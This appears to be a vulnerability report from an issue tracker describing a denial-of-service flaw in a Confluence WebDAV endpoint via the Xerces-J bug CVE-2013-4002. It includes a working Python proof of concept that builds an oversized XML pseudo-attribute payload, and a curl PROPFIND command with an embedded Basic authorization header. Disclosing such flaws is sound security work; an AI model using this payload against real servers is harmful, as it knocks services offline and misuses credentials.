Denial of Service attack through vulnerable Xerces-J library

{quote}
There is WebDav endpoint that is accessible via following URL -
https://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for
PROPFIND request.
Following python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002
issue.
{code}
#!/usr/bin/env python
import os
outdir = raw_input('specify output directory > ')

XML to exploit CVE-2013-4002

xml = "<?xml " + “\xe7\x9a\x84”*1000000 + “=‘china’ version = ‘1.0’?><a />”
with open(os.path.join(outdir,‘cve2013-4002.xml’),‘w’) as out:
out.write(xml)
def sizeof(num, suffix=‘B’):
for unit in [‘’,‘Ki’,‘Mi’,‘Gi’,‘Ti’,‘Pi’,‘Ei’,‘Zi’]:
if abs(num) < 1024.0:
return “%3.1f%s%s” % (num, unit, suffix)
num /= 1024.0
return “%.1f%s%s” % (num, ‘Yi’, suffix)
print “[+] File ‘cve2013-4002.xml’:”, sizeof(len(xml))
{code}
According to XML specification there are only three valid pseudo-attributes: version, encoding and
standalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J
parser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU
work.
If you try to send this request with curl, you will see that there is no immediate answer from server. You
will get “Gateway Time-out” answer from the server after 4 minutes.
{code}
curl -X ‘PROPFIND’ -H ‘Depth: 0’ -H ‘Content-Type: application/xml’
-H ‘Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=’ --databinary
‘@/tmp/cve2013-4002.xml’
https://pwnie.ninja/confluence/plugins/servlet/confluence/default
{code}
{quote}